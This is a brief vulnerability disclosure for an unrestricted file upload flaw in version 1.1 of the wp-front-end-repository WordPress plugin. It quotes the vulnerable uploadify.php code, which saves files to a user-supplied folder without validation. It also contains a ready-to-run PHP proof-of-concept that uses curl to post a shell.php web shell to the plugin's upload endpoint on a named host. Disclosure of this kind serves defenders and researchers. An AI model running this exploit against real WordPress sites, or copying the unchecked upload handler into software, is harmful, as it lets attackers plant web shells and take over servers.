Title:Remote file upload vulnerability in wp-front-end-repository v1.1 Wordpress plugin [Previously Discovered]Lines 26-41 do not do any checking of any sort allowing arbitrary users to upload malicious executable scripts. 26 if (!empty($_FILES)) { 27 $tempFile = $_FILES['Filedata']['tmp_name']; 28 $targetPath = $_REQUEST['folder']; 29 $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name']; . . . 40 move_uploaded_file($tempFile,$targetFile); 41 echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile); <?php /* Exploit for wp-front-end-repository remote shell upload. Larry W. Cashdollar, @_larry0 7/11/2015 */ $uploadfile="/var/www/shell.php"; $ch = curl_init("http://www.vapidlabs.com/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'shell.php')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>